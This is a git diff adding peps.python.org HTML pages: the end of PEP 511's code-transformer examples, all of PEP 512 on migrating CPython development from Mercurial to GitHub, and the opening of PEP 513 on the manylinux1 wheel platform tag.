+                              code.co_cellvars)
+
+# replace existing code transformers with the new bytecode transformer
+sys.set_code_transformers([BytecodeTransformer()])
+
+# execute code which will be transformed by code_transformer()
+exec("print('Hello World!')")
+
+
+

Output:

+
Ni! Ni! Ni!
+
+
+
+
+

AST transformer

+

Similarly to the bytecode transformer example, the AST transformer also +replaces all strings with "Ni! Ni! Ni!":

+
import ast
+import sys
+
+class KnightsWhoSayNi(ast.NodeTransformer):
+    def visit_Str(self, node):
+        node.s = 'Ni! Ni! Ni!'
+        return node
+
+class ASTTransformer:
+    name = "knights_who_say_ni"
+
+    def __init__(self):
+        self.transformer = KnightsWhoSayNi()
+
+    def ast_transformer(self, tree, context):
+        self.transformer.visit(tree)
+        return tree
+
+# replace existing code transformers with the new AST transformer
+sys.set_code_transformers([ASTTransformer()])
+
+# execute code which will be transformed by ast_transformer()
+exec("print('Hello World!')")
+
+
+

Output:

+
Ni! Ni! Ni!
+
+
+
+
+
+

Other Python implementations

+

PEP 511 should be implemented by all Python implementations, but the bytecode and the AST are not standardized.

+

Even between minor versions of CPython, there are changes to the AST API, though only minor ones. It is quite easy to write an AST transformer which works on both Python 2.7 and Python 3.5, for example.

+
+
+

Discussion

+ +
+
+

Prior Art

+
+

AST optimizers

+

Issue #17515, “Add sys.setasthook() to allow to use a custom AST optimizer”, was a first attempt at an API for code transformers, but specific to the AST.

+

In 2015, Victor Stinner wrote the fatoptimizer project, an AST optimizer +specializing functions using guards.

+

In 2014, Kevin Conway created the PyCC +optimizer.

+

In 2012, Victor Stinner wrote the astoptimizer project, an AST optimizer implementing various optimizations. The most interesting optimizations break Python semantics, since no guard is used to disable an optimization if something changes.

+

In 2011, Eugene Toder proposed to rewrite some peephole optimizations in +a new AST optimizer: issue #11549, Build-out an AST optimizer, moving +some functionality out of the peephole optimizer. The patch adds ast.Lit (it +was proposed to rename it to ast.Literal).

+
+
+

Python Preprocessors

+
    +
  • MacroPy: MacroPy is an +implementation of Syntactic Macros in the Python Programming Language. +MacroPy provides a mechanism for user-defined functions (macros) to +perform transformations on the abstract syntax tree (AST) of a Python +program at import time.
  • +
  • pypreprocessor: C-style +preprocessor directives in Python, like #define and #ifdef
  • +
+
+
+

Bytecode transformers

+
    +
  • codetransformer: +Bytecode transformers for CPython inspired by the ast module’s +NodeTransformer.
  • +
  • byteplay: Byteplay lets you +convert Python code objects into equivalent objects which are easy to +play with, and lets you convert those objects back into living Python +code objects. It’s useful for applying crazy transformations on Python +functions, and is also useful in learning Python byte code +intricacies. See byteplay documentation.
  • +
+

See also:

+ +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0511.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0512/index.html b/pep-0512/index.html new file mode 100644 index 00000000000..9054382a314 --- /dev/null +++ b/pep-0512/index.html @@ -0,0 +1,1177 @@ + PEP 512 – Migrating from hg.python.org to GitHub | peps.python.org +
+
+


+ + +
+
+
+

PEP 512 – Migrating from hg.python.org to GitHub

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Core-Workflow list
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
17-Jan-2015
+
Post-History:
+
17-Jan-2016, 19-Jan-2016, 23-Jan-2016
+
+
+
+
+
+

Note

+

CPython’s development process moved to https://github.com/python/cpython +on 2017-02-10.

+
+
+

Abstract

+

This PEP outlines the steps required to migrate Python’s development +process from Mercurial [3] as hosted at +hg.python.org [1] to Git [4] on GitHub [2]. Meeting +the minimum goals of this PEP should allow for the development +process of Python to be as productive as it currently is, and meeting +its extended goals should improve the development process from its +status quo.

+
+
+

Rationale

+

In 2014, it became obvious that Python’s custom development +process was becoming a hindrance. As an example, for an external +contributor to submit a fix for a bug that eventually was committed, +the basic steps were:

+
    +
  1. Open an issue for the bug at bugs.python.org [5].
  2. +
3. Check out the CPython source code from hg.python.org [1].
  4. +
  5. Make the fix.
  6. +
  7. Upload a patch.
  8. +
  9. Have a core developer review the patch using our fork of the +Rietveld code review tool [6].
  10. +
  11. Download the patch to make sure it still applies cleanly.
  12. +
  13. Run the test suite manually.
  14. +
15. Update the NEWS, ACKS, and “What’s New” document as necessary.
  16. +
  17. Pull changes to avoid a merge race.
  18. +
  19. Commit the change manually.
  20. +
  21. If the change was for a bugfix release, merge into the +in-development branch.
  22. +
  23. Run the test suite manually again.
  24. +
  25. Commit the merge.
  26. +
  27. Push the changes.
  28. +
+

This is a very heavy, manual process for core developers. Even in the +simple case, you could only possibly skip the code review step, as you +would still need to build the documentation. This led to patches +languishing on the issue tracker due to core developers not being +able to work through the backlog fast enough to keep up with +submissions. In turn, that led to a side-effect issue of discouraging +outside contribution due to frustration from lack of attention, which +is a dangerous problem for an open source project with no corporate +backing as it runs counter to having a viable future for the project. +While allowing patches to be uploaded to bugs.python.org [5] is +potentially simple for an external contributor, it is as slow and +burdensome as it gets for a core developer to work with.

+

Hence the decision was made in late 2014 that a move to a new +development process was needed. A request for PEPs +proposing new workflows was made, in the end leading to two: +PEP 481 and PEP 507 proposing GitHub [2] and +GitLab [7], respectively.

+

The year 2015 was spent off-and-on working on those proposals and +trying to tease out details of what made them different from each +other on the core-workflow mailing list [8]. +PyCon US 2015 also showed that the community was a bit frustrated +with our process due to both cognitive overhead for new contributors +and how long it was taking for core developers to +look at a patch (see the end of Guido van Rossum’s +keynote at PyCon US 2015 [9] as an example of the +frustration).

+

On January 1, 2016, the decision was made by Brett Cannon to move the +development process to GitHub. The key reasons for choosing GitHub +were [10]:

+
    +
  • Maintaining custom infrastructure has been a burden on volunteers +(e.g., an unmaintained, custom fork of Rietveld [6] +is currently being used).
  • +
  • The custom workflow is very time-consuming for core developers +(not enough automated tooling built to help support it).
  • +
  • The custom workflow is a hindrance to external contributors +(acts as a barrier of entry due to time required to ramp up on +development process unique to CPython itself).
  • +
  • There is no feature differentiating GitLab from GitHub beyond +GitLab being open source.
  • +
  • Familiarity with GitHub is far higher among core developers and +external contributors than with GitLab.
  • +
  • Our BDFL prefers GitHub (who would be the first person to tell +you that his opinion shouldn’t matter, but the person making the +decision felt it was important that the BDFL feel comfortable with +the workflow of his own programming language to encourage his +continued participation).
  • +
+

There’s even already an unofficial logo to represent the +migration to GitHub [22].

+

The overarching goal of this migration is to improve the development process to the extent that a core developer can go from external contribution submission through all the steps leading to committing said contribution from within a browser on a tablet with WiFi, using some development process (this does not inherently mean GitHub’s default workflow). The final solution will also allow an external contributor to contribute even if they choose not to use GitHub (although there is no guarantee of feature parity).

+
+
+

Repositories to Migrate

+

While hg.python.org [1] hosts many repositories, there are only +five key repositories that need to move:

+
    +
  1. devinabox [12] (done)
  2. +
  3. benchmarks [11] (skipped)
  4. +
  5. peps [13] (done)
  6. +
  7. devguide [14] (done)
  8. +
  9. cpython [15]
  10. +
+

The devinabox repository is code-only. +The peps and devguide repositories involve the generation of webpages. +And the cpython repository has special requirements for integration +with bugs.python.org [5].

+
+
+

Migration Plan

+

The migration plan is separated into sections based on what is +required to migrate the repositories listed in the +Repositories to Migrate section. Completion of requirements +outlined in each section should unblock the migration of the related +repositories. The sections are expected to be completed in order, but +not necessarily the requirements within a section.

+
+

Requirements for Code-Only Repositories

+

Completion of the requirements in this section will allow the +devinabox repository to move to GitHub.

+
+

Create a ‘Python core’ team

+

To manage permissions, a ‘Python core’ team will be created as part of +the python organization [16]. Any repository that is +moved will have the ‘Python core’ team added to it with write +permissions [17]. Anyone who previously had rights to +manage SSH keys on hg.python.org will become a team maintainer for the +‘Python core’ team.

+
+
+

Define commands to move a Mercurial repository to Git

+

Since moving to GitHub also entails moving to Git [4], we must +decide what tools and commands we will run to translate a Mercurial +repository to Git. The tools developed specifically for this migration +are hosted at https://github.com/orsenthil/cpython-hg-to-git .

+
+
+

CLA enforcement

+

A key part of any open source project is making sure that its source +code can be properly licensed. This requires making sure all people +making contributions have signed a contributor license agreement +(CLA) [18]. Up until now, enforcement of CLA signing of +contributed code has been enforced by core developers checking +whether someone had an * by their username on +bugs.python.org [5]. With this migration, the plan is to start +off with automated checking and enforcement of contributors signing +the CLA.

+
+
Adding GitHub username support to bugs.python.org
+

To keep tracking of CLA signing under the direct control of the PSF, +tracking who has signed the PSF CLA will be continued by marking that +fact as part of someone’s bugs.python.org user profile. What this +means is that an association will be needed between a person’s +bugs.python.org [5] account and their GitHub account, which +will be done through a new field in a user’s profile. This does +implicitly require that contributors will need both a +GitHub [2] and bugs.python.org account in order to sign the +CLA and contribute through GitHub.

+

An API is provided to query bugs.python.org to see if a GitHub +username corresponds to someone who has signed the CLA. Making a GET +request to e.g. +http://bugs.python.org/user?@template=clacheck&github_names=brettcannon,notanuser +returns a JSON dictionary with the keys of the usernames requested +and a true value if they have signed the CLA, false if they +have not, and null if no corresponding GitHub username was found.
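
A minimal sketch of querying that endpoint, assuming the response shape described above (cla_status is an illustrative helper, not an official client):

+
import json
+from urllib.request import urlopen
+
+def cla_status(github_names):
+    url = ("http://bugs.python.org/user?@template=clacheck&github_names="
+           + ",".join(github_names))
+    with urlopen(url) as response:
+        # e.g. {"brettcannon": true, "notanuser": null}
+        return json.loads(response.read().decode("utf-8"))
+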

+
+
+
A bot to enforce CLA signing
+

With an association between someone’s GitHub account and their +bugs.python.org [5] account, which has the data as to whether +someone has signed the CLA, a bot can monitor pull requests on +GitHub and denote whether the contributor has signed the CLA.

+

If the user has signed the CLA, the bot will add a positive label to the issue to denote the pull request has no CLA issues (e.g., a green label stating, “CLA signed”). If the contributor has not signed a CLA, a negative label will be added and the pull request will be blocked using GitHub’s status API (e.g., a red label stating, “CLA not signed”). If a contributor lacks a bugs.python.org account, that will lead to the negative label being used as well. Using a label for both positive and negative cases provides a fallback signal if the bot happens to fail, preventing potential false-positives or false-negatives. It also allows for an easy way to trigger the bot again by simply removing a CLA-related label (this is in contrast to using a GitHub status check [40] which is only triggered on code changes).

+

As no pre-existing bot exists to meet our needs, it will be hosted on +Heroku [39] and written to target Python 3.5 to act as a +showcase for asynchronous programming. The code for the bot is hosted +in the Knights Who Say Ni project [41].

+
+
+
+

Make old repository read-only

+

Updating .hg/hgrc in the now-old Mercurial repository in the [hooks] +section with:

+
pretxnchangegroup.reject = echo " * This repo has been migrated to github.com/python/peps and does not accept new commits in Mercurial!" 2>&1; exit 1
+
+
+

will make the repository read-only.

+
+
+ +
+

Requirements for the cpython Repository

+

Obviously the most active and important repository currently hosted +at hg.python.org [1] is the cpython +repository [15]. Because of its importance and +high-frequency use, it requires more tooling before being moved to GitHub +compared to the other repositories mentioned in this PEP.

+
+

Document steps to commit a pull request

+

During the process of choosing a new development workflow, it was +decided that a linear history is desired. People preferred having a +single commit representing a single change instead of having a set of +unrelated commits lead to a merge commit that represented a single +change. This means that the convenient “Merge” button in GitHub pull +requests will be set to only do squash commits and not merge +commits.

+

A second set of recommended commands will also be written for committing a contribution from a patch file uploaded to bugs.python.org [5]. This will obviously help keep the linear history, but care will need to be taken to give attribution to the patch author.

+

The exact sequence of commands that will be given as guidelines to +core developers is an open issue: +Git CLI commands for committing a pull request to cpython.

+
+
+

Linking pull requests to issues

+

Historically, external contributions were attached to an issue on bugs.python.org [5] thanks to the fact that all external contributions were uploaded as a file. For changes committed directly by a core developer, specifying an issue number in the format Issue # at the start of the commit message led to a comment being posted to the issue linking to the commit.

+
+
Linking a pull request to an issue
+

An association between a pull request and an issue is needed to track when a fix has been proposed. The association needs to be many-to-one, as it can take multiple pull requests to solve a single issue (technically it should be a many-to-many association for when a single fix solves multiple issues, but this is fairly rare and issues can be merged into one using the Superseder field on the issue tracker).

+

The association between a pull request and an issue will be done based +on detecting an issue number. If the issue is specified in either the +title or in the body of a message on a pull request then a connection +will be made on bugs.python.org [5]. Some visible notification +– e.g. label or message – will be made to the pull request to +notify that the association was successfully made.
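
One possible matching rule, as a hedged sketch (the exact pattern the bot would use is not specified by this PEP):

+
import re
+
+ISSUE_NUMBER = re.compile(r"\bissue\s*#?\s*(\d+)", re.IGNORECASE)
+
+def linked_issues(title, body):
+    # collect every issue number mentioned in the title or body
+    return sorted({int(num)
+                   for num in ISSUE_NUMBER.findall(title + "\n" + body)})
+
+linked_issues("Fix crash (issue #26098)", "See also issue 12345.")
+# -> [12345, 26098]
+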

+
+
+
Notify the issue if a commit is made
+

Once a commit is made, the corresponding issue should be updated to +reflect this fact. This should work regardless of whether the commit +came from a pull request or a direct commit.

+
+
+
+

Update the linking service for mapping commit IDs to URLs

+

Currently you can use https://hg.python.org/lookup/ with a revision +ID from either the Subversion or Mercurial copies of the +cpython repo [15] to get redirected to the URL for that +revision in the Mercurial repository. The URL rewriter will need to +be updated to redirect to the Git repository and to support the new +revision IDs created for the Git repository.

+

The most likely design is to statically know all the Mercurial changeset numbers once the migration has occurred. The lookup code will then be updated to accept hashes from 7 to 40 hexadecimal digits. Any hash of length 12 or 40 will be compared against the Mercurial changeset numbers. If the number doesn’t match or is of some other length between 7 and 40, then it will be assumed to be a Git hash.
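
A hedged sketch of that lookup heuristic (HG_CHANGESETS stands in for the statically known set of Mercurial changeset numbers):

+
import re
+
+HG_CHANGESETS = set()   # assumed to be frozen at migration time
+
+def classify_revision(rev):
+    # accept hashes from 7 to 40 hexadecimal digits
+    if not re.fullmatch(r"[0-9a-fA-F]{7,40}", rev):
+        return None
+    # only 12- and 40-digit hashes can be Mercurial changeset numbers
+    if len(rev) in (12, 40) and rev.lower() in HG_CHANGESETS:
+        return "hg"
+    return "git"
+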

+

The bugs.python.org commit number rewriter +will also need to be updated to accept hashes as short as 7 digits as +Git will match on hashes that short or longer.

+
+
+

Deprecate sys._mercurial

+

Once Python is no longer kept in Mercurial, the sys._mercurial +attribute will need to be changed to return ('CPython', '', ''). +An equivalent sys._git attribute will be added which fulfills the +same use-cases.

+
+
+

Update the devguide

+

The devguide will need to be updated with details of the new workflow. Most likely, work will take place in a separate branch until the migration actually occurs.

+
+
+

Update PEP 101

+

The release process will need to be updated as necessary.

+
+
+
+

Optional, Planned Features

+

Once the cpython repository [15] is migrated, all +repositories will have been moved to GitHub [2] and the +development process should be on equal footing as before the move. But +a key reason for this migration is to improve the development process, +making it better than it has ever been. This section outlines some +plans on how to improve things.

+

It should be mentioned that overall feature planning for +bugs.python.org [5] – which includes plans independent of this +migration – are tracked on their own wiki page [23].

+
+

Handling Misc/NEWS

+

Traditionally the Misc/NEWS file [19] has been +problematic for changes which spanned Python releases. Oftentimes +there will be merge conflicts when committing a change between e.g., +3.5 and 3.6 only in the Misc/NEWS file. It’s so common, in fact, +that the example instructions in the devguide explicitly mention how +to resolve conflicts in the Misc/NEWS file +[21]. As part of our tool +modernization, working with the Misc/NEWS file will be +simplified.

+

The planned approach is to use an individual file per news entry, containing the text for the entry. In this scenario, each feature release would have its own directory for news entries, and a separate file would be created in that directory, named either after the issue it closed or a timestamp value (which prevents collisions). Merges across branches would have no issue, as the news entry file would still be uniquely named and in the directory of the latest version that contained the fix. A script would collect all news entry files no matter what directory they reside in and create an appropriate news file (the release directory can be ignored, as the mere fact that the file exists is enough to represent that the entry belongs to the release). Classification can either be done by keyword in the news entry file itself or by using subdirectories representing each news entry classification in each release directory (or classification of news entries could be dropped, since critical information is captured by the “What’s New” documents, which are organized).

+

The benefit of this approach is that it keeps the changes with the code that was actually changed. It also ties the message to being part of the commit which introduced the change. For a commit made through the CLI, a script could be provided to help generate the file. In a bot-driven scenario, the merge bot could have a way to specify a specific news entry and create the file as part of its flattened commit (while most likely also supporting using the first line of the commit message if no specific news entry was specified). If a web-based workflow is used, then a status check could be used to verify that a news entry file is in the pull request, acting as a reminder that the file is missing.

+

Code for this approach has been written previously for the Mercurial workflow at http://bugs.python.org/issue18967. There are also tools from the community like https://pypi.python.org/pypi/towncrier, https://github.com/twisted/newsbuilder, and http://docs.openstack.org/developer/reno/.
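
A hedged sketch of such a collection script (the Misc/NEWS.d layout and entry naming here are illustrative assumptions, not a decided design):

+
from pathlib import Path
+
+def collect_news(news_dir="Misc/NEWS.d"):
+    # one file per news entry, grouped by the release directory it lives in
+    releases = {}
+    for entry in sorted(Path(news_dir).glob("*/*")):
+        releases.setdefault(entry.parent.name, []).append(
+            entry.read_text().strip())
+    return releases
+
+# e.g. {"3.6.0": ["bpo-12345: Fixed ...", ...], "3.7.0": [...]}
+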

+

Discussions at the Sep 2016 Python core-dev sprints led to this +decision compared to the rejected approaches outlined in the +Rejected Ideas section of this PEP. The separate files approach +seems to have the right balance of flexibility and potential tooling +out of the various options while solving the motivating problem.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/6.

+
+
+

Handling Misc/ACKS

+

Traditionally the Misc/ACKS file [20] has been managed +by hand. But thanks to Git supporting an author value as well as +a committer value per commit, authorship of a commit can be part +of the history of the code itself.

+

As such, manual management of Misc/ACKS will become optional. A +script will be written that will collect all author and committer +names and merge them into Misc/ACKS with all of the names listed +prior to the move to Git. Running this script will become part of the +release process.
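
A hedged sketch of such a script using git’s log formatting (%aN and %cN are the mailmap-aware author and committer names; merging into the existing Misc/ACKS is left out):

+
import subprocess
+
+def contributor_names(repo="."):
+    # one author name and one committer name per commit, newline-separated
+    log = subprocess.check_output(
+        ["git", "-C", repo, "log", "--format=%aN%n%cN"],
+        universal_newlines=True)
+    return sorted(set(filter(None, log.splitlines())))
+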

+

The script should also generate a list of all people who contributed +since the last execution. This will allow having a list of those who +contributed to a specific release so they can be explicitly thanked.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/7.

+
+
+

Create https://git.python.org

+

Just as hg.python.org [1] currently points to the Mercurial +repository for Python, git.python.org should do the equivalent for +the Git repository.

+
+
+

Backup of pull request data

+

Since GitHub [2] is going to be used for code hosting and code +review, those two things need to be backed up. In the case of code +hosting, the backup is implicit as all non-shallow Git [4] clones +contain the full history of the repository, hence there will be many +backups of the repository.

+

The code review history does not have the same implicit backup +mechanism as the repository itself. That means a daily backup of code +review history should be done so that it is not lost in case of any +issues with GitHub. It also helps guarantee that a migration from +GitHub to some other code review system is feasible were GitHub to +disappear overnight.

+
+
+

Bot to generate cherry-pick pull requests

+

Since the decision has been made to work with cherry-picks instead of +forward merging of branches, it would be convenient to have a bot that +would generate pull requests based on cherry-picking for any pull +requests that affect multiple branches. The most likely design is a +bot that monitors merged pull requests with key labels applied that +delineate what branches the pull request should be cherry-picked into. +The bot would then generate cherry-pick pull requests for each label +and remove the labels as the pull requests are created (this allows +for easy detection when automatic cherry-picking failed).

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/8.

+
+
+

Pull request commit queue

+

This would linearly apply accepted pull requests and verify that the commits did not interfere with each other by running the test suite and backing out commits if the test run failed. To help facilitate the speed of testing, all patches committed since the last test run can be applied at once under a single test run, as the optimistic assumption is that the patches will work in tandem. Some mechanism to re-run the tests in case of test flakiness will be needed, whether it is removing a “test failed” label, a web interface for core developers to trigger another testing event, etc.

+

Inspiration or basis of the bot could be taken from pre-existing bots +such as Homu [31] or Zuul [32].

+

The name given to this bot in order to give it commands is an open +issue: Naming the bots.

+
+
+

A CI service

+

There are various CI services that provide free support for open +source projects hosted on GitHub [2]. After experimenting +with a couple CI services, the decision was made to go with +Travis [33].

+

The current CI service for Python is Pypatcher [38]. A +request can be made in IRC to try a patch from +bugs.python.org [5]. The results can be viewed at +https://ci.centos.org/job/cPython-build-patch/ .

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/1.

+
+
+

Test coverage report

+

Getting an up-to-date test coverage report for Python’s standard library would be extremely beneficial, as such a report can take quite a while to produce.

+

There are a couple pre-existing services that provide free test +coverage for open source projects. In the end, Codecov [37] was +chosen as the best option.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/2.

+
+
+

Notifying issues of pull request comments

+

The current development process does not include notifying an issue on bugs.python.org [5] when a review comment is left on Rietveld [6]. It would be nice to fix this so that people can subscribe only to comments at bugs.python.org and not GitHub [2] and yet still know when something occurs on GitHub in terms of review comments on relevant pull requests. Current thinking is to post a comment to the relevant issue on bugs.python.org when at least one review comment has been made over a certain period of time (e.g., 15 or 30 minutes, although with GitHub now supporting reviews the time aspect may be unnecessary). This keeps the email volume down for those that receive both GitHub and bugs.python.org email notifications while still making sure that those only following bugs.python.org know when there might be a review comment to address.

+
+
+

Allow bugs.python.org to use GitHub as a login provider

+

As of right now, bugs.python.org [5] allows people to log in +using Google, Launchpad, or OpenID credentials. It would be good to +expand this to GitHub credentials.

+
+
+

Web hooks for re-generating web content

+

The content at https://docs.python.org/, +https://docs.python.org/devguide, and +https://www.python.org/dev/peps/ are all derived from files kept in +one of the repositories to be moved as part of this migration. As +such, it would be nice to set up appropriate webhooks to trigger +rebuilding the appropriate web content when the files they are based +on change instead of having to wait for, e.g., a cronjob to trigger.

+

This can partially be solved if the documentation is a Sphinx project +as then the site can have an unofficial mirror on +Read the Docs, e.g. +http://cpython-devguide.readthedocs.io/.

+

Work for this is being tracked at +https://github.com/python/core-workflow/issues/9.

+
+ +
+

Splitting out parts of the documentation into their own repositories

+

While certain parts of the documentation at https://docs.python.org +change with the code, other parts are fairly static and are not +tightly bound to the CPython code itself. The following sections of +the documentation fit this category of slow-changing, +loosely-coupled:

+ +

These parts of the documentation could be broken out into their own +repositories to simplify their maintenance and to expand who has +commit rights to them to ease in their maintenance.

+

It has also been suggested to split out the +What’s New +documents. That would require deciding whether a workflow could be +developed where it would be difficult to forget to update +What’s New (potentially through a label added to PRs, like +“What’s New needed”).

+
+
+

Backup of Git repositories

+

While not necessary, it would be good to have official backups of the +various Git repositories for disaster protection. It will be up to +the PSF infrastructure committee to decide if this is worthwhile or +unnecessary.

+
+
+

Identify potential new core developers

+

The Python development team has long-standing guidelines for +selecting new core developers. The key part of the guidelines is that +a person needs to have contributed multiple patches which have been +accepted and are high enough quality and size to demonstrate an +understanding of Python’s development process. A bot could be written +which tracks patch acceptance rates and generates a report to help +identify contributors who warrant consideration for becoming core +developers. This work doesn’t even necessarily require GitHub +integration as long as the committer field in all git commits is +filled in properly.

+

Work is being tracked at +https://github.com/python/core-workflow/issues/10.

+
+
+
+
+

Status

+

Requirements for migrating the devinabox [12] +repository:

+ +

Repositories whose build steps need updating:

+
    +
  • Completed +
  • +
+
+

cpython repo [15]

+

Required:

+ +

Optional features:

+ +
+
+
+

Open Issues

+

For this PEP, open issues are ones where a decision needs to be made +to how to approach or solve a problem. Open issues do not entail +coordination issues such as who is going to write a certain bit of +code.

+
+

The fate of hg.python.org

+

With the code repositories moving over to Git [4], there is no +technical need to keep hg.python.org [1] running. Having said +that, some in the community would like to have it stay functioning as +a Mercurial [3] mirror of the Git repositories. Others have said +that they still want a mirror, but one using Git.

+

As maintaining hg.python.org is not necessary, it will be up to the +PSF infrastructure committee to decide if they want to spend the +time and resources to keep it running. They may also choose whether +they want to host a Git mirror on PSF infrastructure.

+

Depending on the decision reached, other ancillary repositories will either be forced to migrate or can choose to simply stay on hg.python.org.

+
+
+

Git CLI commands for committing a pull request to cpython

+

Because Git [4] may be a new version control system for core +developers, the commands people are expected to run will need to be +written down. These commands also need to keep a linear history while +giving proper attribution to the pull request author.

+

Another set of commands will also be necessary for when working with +a patch file uploaded to bugs.python.org [5]. Here the linear +history will be kept implicitly, but it will need to make sure to +keep/add attribution.

+
+
+

Naming the bots

+

As naming things can lead to bikeshedding of epic proportions, Brett +Cannon will choose the final name of the various bots (the name of +the project for the bots themselves can be anything, this is purely +for the name used in giving commands to the bot or the account name). +The names must come from Monty Python, which is only fitting since +Python is named after the comedy troupe.

+
+
+
+

Rejected Ideas

+
+

Separate Python 2 and Python 3 repositories

+

It was discussed whether separate repositories for Python 2 and +Python 3 were desired. The thinking was that this would shrink the +overall repository size which benefits people with slow Internet +connections or small bandwidth caps.

+

In the end it was decided that it was easier logistically to simply +keep all of CPython’s history in a single repository.

+
+
+

Commit multi-release changes in bugfix branch first

+

As the current development process has changes committed in the +oldest branch first and then merged up to the default branch, the +question came up as to whether this workflow should be perpetuated. +In the end it was decided that committing in the newest branch and +then cherry-picking changes into older branches would work best as +most people will instinctively work off the newest branch and it is a +more common workflow when using Git [4].

+

Cherry-picking is also more bot-friendly for an in-browser workflow. +In the merge-up scenario, if you were to request a bot to do a merge +and it failed, then you would have to make sure to immediately solve +the merge conflicts if you still allowed the main commit, else you +would need to postpone the entire commit until all merges could be +handled. With a cherry-picking workflow, the main commit could +proceed while postponing the merge-failing cherry-picks. This allows +for possibly distributing the work of managing conflicting merges.

+

Lastly, cherry-picking should help avoid merge races. Currently, when +one is doing work that spans branches, it takes time to commit in the +older branch, possibly push to another clone representing the +default branch, merge the change, and then push upstream. +Cherry-picking should decouple this so that you don’t have to rush +your multi-branch changes as the cherry-pick can be done separately.

+
+
+

Deriving Misc/NEWS from the commit logs

+

As part of the discussion surrounding Handling Misc/NEWS, the +suggestion has come up of deriving the file from the commit logs +itself. In this scenario, the first line of a commit message would be +taken to represent the news entry for the change. Some heuristic to +tie in whether a change warranted a news entry would be used, e.g., +whether an issue number is listed.

+

This idea has been rejected due to some core developers preferring to write a news entry separate from the commit message. The argument is that the first line of a commit message and a news entry have different requirements in terms of brevity, what should be said, etc.

+
+
+

Deriving Misc/NEWS from bugs.python.org

+

A rejected solution to the NEWS file problem was to specify the entry on bugs.python.org [5]. This would mean an issue that is marked as “resolved” could not be closed until a news entry is added in the “news” field in the issue tracker. The benefit of tying the news entry to the issue is it makes sure that all changes worthy of a news entry have an accompanying issue. It also makes classifying a news entry automatic thanks to the Component field of the issue. The Versions field of the issue also ties the news entry to which Python releases were affected. A script would be written to query bugs.python.org for relevant news entries for a release and to produce the output needed to be checked into the code repository. This approach is agnostic to whether a commit was done by CLI or bot. A drawback is that there’s a disconnect between the actual commit that made the change and the news entry by having them live in separate places (in this case, GitHub and bugs.python.org). This would mean making a commit would then require remembering to go back to bugs.python.org to add the news entry.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0512.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0513/index.html b/pep-0513/index.html new file mode 100644 index 00000000000..41b18a27434 --- /dev/null +++ b/pep-0513/index.html @@ -0,0 +1,762 @@ + PEP 513 – A Platform Tag for Portable Linux Built Distributions | peps.python.org +
+
+


+ + +
+
+
+

PEP 513 – A Platform Tag for Portable Linux Built Distributions

+
+
Author:
+
Robert T. McGibbon <rmcgibbo at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
19-Jan-2016
+
Post-History:
+
19-Jan-2016, 25-Jan-2016, 29-Jan-2016
+
Superseded-By:
+
600
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Abstract

+

This PEP proposes the creation of a new platform tag for Python package built +distributions, such as wheels, called manylinux1_{x86_64,i686} with +external dependencies limited to a standardized, restricted subset of +the Linux kernel and core userspace ABI. It proposes that PyPI support +uploading and distributing wheels with this platform tag, and that pip +support downloading and installing these packages on compatible platforms.

+
+
+

Rationale

+

Currently, distribution of binary Python extensions for Windows and OS X is +straightforward. Developers and packagers build wheels (PEP 427, PEP 491), +which are +assigned platform tags such as win32 or macosx_10_6_intel, and upload +these wheels to PyPI. Users can download and install these wheels using tools +such as pip.

+

For Linux, the situation is much more delicate. In general, compiled Python +extension modules built on one Linux distribution will not work on other Linux +distributions, or even on different machines running the same Linux +distribution with different system libraries installed.

+

Build tools using PEP 425 platform tags do not track information about the +particular Linux distribution or installed system libraries, and instead assign +all wheels the too-vague linux_i686 or linux_x86_64 tags. Because of +this ambiguity, there is no expectation that linux-tagged built +distributions compiled on one machine will work properly on another, and for +this reason, PyPI has not permitted the uploading of wheels for Linux.

+

It would be ideal if wheel packages could be compiled that would work on any +linux system. But, because of the incredible diversity of Linux systems – from +PCs to Android to embedded systems with custom libcs – this cannot +be guaranteed in general.

+

Instead, we define a standard subset of the kernel+core userspace ABI that, +in practice, is compatible enough that packages conforming to this standard +will work on many linux systems, including essentially all of the desktop +and server distributions in common use. We know this because there are +companies who have been distributing such widely-portable pre-compiled Python +extension modules for Linux – e.g. Enthought with Canopy [4] and Continuum +Analytics with Anaconda [5].

+

Building on the compatibility lessons learned from these companies, we thus +define a baseline manylinux1 platform tag for use by binary Python +wheels, and introduce the implementation of preliminary tools to aid in the +construction of these manylinux1 wheels.

+
+
+

Key Causes of Inter-Linux Binary Incompatibility

+

To properly define a standard that will guarantee that wheel packages meeting +this specification will operate on many linux platforms, it is necessary to +understand the root causes which often prevent portability of pre-compiled +binaries on Linux. The two key causes are dependencies on shared libraries +which are not present on users’ systems, and dependencies on particular +versions of certain core libraries like glibc.

+
+

External Shared Libraries

+

Most desktop and server linux distributions come with a system package manager +(examples include APT on Debian-based systems, yum on +RPM-based systems, and pacman on Arch linux) that manages, among other +responsibilities, the installation of shared libraries installed to system +directories such as /usr/lib. Most non-trivial Python extensions will depend +on one or more of these shared libraries, and thus function properly only on +systems where the user has the proper libraries (and the proper +versions thereof), either installed using their package manager, or installed +manually by setting certain environment variables such as LD_LIBRARY_PATH +to notify the runtime linker of the location of the depended-upon shared +libraries.

+
+
+

Versioning of Core Shared Libraries

+

Even if the developers of a Python extension module wish to use no external shared libraries, the modules will generally have a dynamic runtime dependency on the GNU C library, glibc. While it is possible, statically linking glibc is usually a bad idea because certain important C functions like dlopen() cannot be called from code that statically links glibc. A runtime shared library dependency on a system-provided glibc is unavoidable in practice.

+

